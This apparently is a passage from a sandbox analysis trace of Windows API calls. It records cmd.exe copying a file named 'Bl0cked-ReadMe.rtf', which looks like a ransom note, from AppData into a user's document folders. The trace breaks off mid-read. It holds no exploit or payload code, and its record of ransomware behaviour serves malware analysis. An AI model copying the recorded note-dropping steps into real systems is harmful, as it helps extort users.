region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35362 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35363 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35364 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35365 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35366 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35367 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35368 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35369 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35370 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35371 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 35372 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 35373 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35374 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 35375 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 35376 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 35377 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 868 os_tid = 0xad8 [0234.941] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfb0c | out: lpSystemTimeAsFileTime=0x2cfb0c*(dwLowDateTime=0xbf7edcc0, dwHighDateTime=0x1d440a9)) [0234.941] GetCurrentProcessId () returned 0x8f0 [0234.941] GetCurrentThreadId () returned 0xad8 [0234.941] GetTickCount () returned 0x4083a [0234.941] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfb04 | out: lpPerformanceCount=0x2cfb04*=29173003523) returned 1 [0234.941] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.941] __set_app_type (_Type=0x1) [0234.941] __p__fmode () returned 0x76b331f4 [0234.941] __p__commode () returned 0x76b331fc [0234.942] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.942] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.942] GetCurrentThreadId () returned 0xad8 [0234.942] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xad8) returned 0x38 [0234.942] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.942] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.942] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.942] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.942] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa9c | out: phkResult=0x2cfa9c*=0x0) returned 0x2 [0234.942] VirtualQuery (in: lpAddress=0x2cfad3, lpBuffer=0x2cfa6c, dwLength=0x1c | out: lpBuffer=0x2cfa6c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.942] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa6c, dwLength=0x1c | out: lpBuffer=0x2cfa6c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.942] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa6c, dwLength=0x1c | out: lpBuffer=0x2cfa6c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.942] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa6c, dwLength=0x1c | out: lpBuffer=0x2cfa6c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.942] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa6c, dwLength=0x1c | out: lpBuffer=0x2cfa6c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.942] GetConsoleOutputCP () returned 0x1b5 [0234.942] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.943] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.943] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.943] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.943] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.943] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.943] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.943] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.943] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.943] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.943] GetEnvironmentStringsW () returned 0x4401b8* [0234.944] FreeEnvironmentStringsW (penv=0x4401b8) returned 1 [0234.944] GetEnvironmentStringsW () returned 0x4401b8* [0234.944] FreeEnvironmentStringsW (penv=0x4401b8) returned 1 [0234.944] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea0c | out: phkResult=0x2cea0c*=0x40) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0xf0, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x1, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0x1, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x0, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x40, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x40, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0x40, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.944] RegCloseKey (hKey=0x40) returned 0x0 [0234.944] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea0c | out: phkResult=0x2cea0c*=0x40) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0x40, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x1, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0x1, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x0, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x9, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x4, lpData=0x2cea18*=0x9, lpcbData=0x2cea10*=0x4) returned 0x0 [0234.944] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea14, lpData=0x2cea18, lpcbData=0x2cea10*=0x1000 | out: lpType=0x2cea14*=0x0, lpData=0x2cea18*=0x9, lpcbData=0x2cea10*=0x1000) returned 0x2 [0234.945] RegCloseKey (hKey=0x40) returned 0x0 [0234.945] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.945] srand (_Seed=0x5b8863c2) [0234.945] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0234.945] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0234.945] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.945] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441918, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.945] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.945] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.945] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.945] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.945] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.945] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.945] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.945] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.945] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.945] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.945] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.945] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.946] GetEnvironmentStringsW () returned 0x442308* [0234.946] FreeEnvironmentStringsW (penv=0x442308) returned 1 [0234.946] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.946] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.946] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.946] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.946] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.946] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.946] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.946] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.946] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.946] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.946] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf7d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.946] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf7d8, lpFilePart=0x2cf7d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf7d4*="Desktop") returned 0x18 [0234.946] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.946] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf554 | out: lpFindFileData=0x2cf554) returned 0x440048 [0234.946] FindClose (in: hFindFile=0x440048 | out: hFindFile=0x440048) returned 1 [0234.946] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf554 | out: lpFindFileData=0x2cf554) returned 0x440048 [0234.947] FindClose (in: hFindFile=0x440048 | out: hFindFile=0x440048) returned 1 [0234.947] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf554 | out: lpFindFileData=0x2cf554) returned 0x440048 [0234.947] FindClose (in: hFindFile=0x440048 | out: hFindFile=0x440048) returned 1 [0234.947] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.947] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.947] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.947] GetEnvironmentStringsW () returned 0x442b28* [0234.947] FreeEnvironmentStringsW (penv=0x442b28) returned 1 [0234.947] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.947] GetConsoleOutputCP () returned 0x1b5 [0234.948] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.948] GetUserDefaultLCID () returned 0x409 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf918, cchData=128 | out: lpLCData="0") returned 2 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf918, cchData=128 | out: lpLCData="0") returned 2 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf918, cchData=128 | out: lpLCData="1") returned 2 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.948] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.948] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.949] GetConsoleTitleW (in: lpConsoleTitle=0x430908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.949] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.949] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.949] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.949] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.950] _wcsicmp (_String1="type", _String2=")") returned 75 [0234.950] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0234.950] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0234.950] _wcsicmp (_String1="IF", _String2="type") returned -11 [0234.950] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0234.950] _wcsicmp (_String1="REM", _String2="type") returned -2 [0234.950] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0234.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.954] GetFileType (hFile=0x7) returned 0x2 [0234.954] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.954] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf810 | out: lpMode=0x2cf810) returned 1 [0234.954] _dup (_FileHandle=1) returned 3 [0234.955] _close (_FileHandle=1) returned 0 [0234.955] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0234.955] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf7e0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0234.955] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0234.955] GetConsoleTitleW (in: lpConsoleTitle=0x2cf610, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.955] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0234.955] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0234.955] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0234.955] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0234.956] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.956] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cf174, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf174) returned 0x430eb8 [0234.956] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0234.956] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0234.956] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0234.957] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ce080, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0234.957] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0234.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.957] GetFileType (hFile=0x54) returned 0x1 [0234.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.957] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ce0d8 | out: lpFileSizeHigh=0x2ce0d8*=0x0) returned 0x1632 [0234.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.957] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.957] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.957] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, lpOverlapped=0x0) returned 1 [0234.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.957] GetFileType (hFile=0x4c) returned 0x1 [0234.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.957] GetFileType (hFile=0x4c) returned 0x1 [0234.957] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.957] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.958] GetFileType (hFile=0x4c) returned 0x1 [0234.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.958] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cef60*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.958] GetFileType (hFile=0x4c) returned 0x1 [0234.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.958] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cefb0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.958] GetFileType (hFile=0x4c) returned 0x1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf000*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf000*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] GetFileType (hFile=0x4c) returned 0x1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf050*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf050*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] GetFileType (hFile=0x4c) returned 0x1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0a0*, lpNumberOfBytesWritten=0x2ce0f4*=0x50, lpOverlapped=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] GetFileType (hFile=0x4c) returned 0x1 [0234.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.959] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0f4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0f0*, lpNumberOfBytesWritten=0x2ce0f4*=0x20, lpOverlapped=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0e0 | out: lpNewFilePointer=0x0) returned 1 [0234.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.959] ReadFile (in: hFile=0x54, lpBuffer=0x2cef10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce100, lpOverlapped=0x0 | out: lpBuffer=0x2cef10*, lpNumberOfBytesRead=0x2ce100*=0x200, 